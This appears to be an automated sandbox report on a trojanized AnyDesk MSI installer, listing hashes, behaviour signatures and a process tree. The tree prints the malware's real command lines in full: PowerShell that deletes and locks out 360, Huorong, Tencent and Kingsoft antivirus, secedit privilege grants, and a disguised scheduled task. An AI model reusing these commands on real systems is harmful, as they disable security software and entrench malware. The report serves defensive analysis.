Overview

overview

10

Static

static

1

Anydesk6.6.msi

windows7-x64

10

Anydesk6.6.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 06:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Anydesk6.6.msi

  • Size

    4.3MB

  • MD5

    ec6e20cf1e3298163f08b2166ba9fa33

  • SHA1

    2e829c7f7ab05279b2af14f61c8265e0ebbc32db

  • SHA256

    41241f3bc8472cba920e35528728ed3a1070aa6b48c50b34ad3f5dcf0dd4d9bb

  • SHA512

    88449b0e10e9f6762a173ea2bb4853c38bb3864a83a97024fa7138ca2e8657daf03c1aa5def0b629d775a0e7f45d9e9b11b27e626f1b9a10ec1a91f90fbf8aa3

  • SSDEEP

    98304:KgBB2Siit8OEzYhTn9XwCA4IkVMDA+loJ:Hiitm0hhwl9NloJ

Score
10/10
defense_evasiondiscoveryevasionexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Using powershell.exe command.

    execution
  • Modifies RDP port number used by Windows 1 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Executes dropped EXE 2 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Anydesk6.6.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3592
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:936
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:1216
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding E36A3B18DC868C971B351726AEA4B676
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3852
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\SysWOW64\fltMC.exe
            fltmc.exe
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1984
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3812
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4676
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚѶµçÄԹܼÒ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2528
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4920
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3824
        • C:\ProgramData\Data\un.exe
          "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\
          3⤵
          • Executes dropped EXE
          PID:2112
        • C:\ProgramData\Program\iusb3mon.exe
          "C:\ProgramData\Program\iusb3mon.exe" false
          3⤵
          • UAC bypass
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:4668
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2024
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3852
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:728
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2584
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4020
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3836
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2908
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1484
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1496
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1336
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:3284
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:4072
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Hide Artifacts: Ignore Process Interrupts
            • System Location Discovery: System Language Discovery
            PID:1212
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2776
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1856
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:3244
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:3344
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Hide Artifacts: Ignore Process Interrupts
            • System Location Discovery: System Language Discovery
            PID:4040
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious use of AdjustPrivilegeToken
      PID:2320

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Event Triggered Execution

    1
    T1546

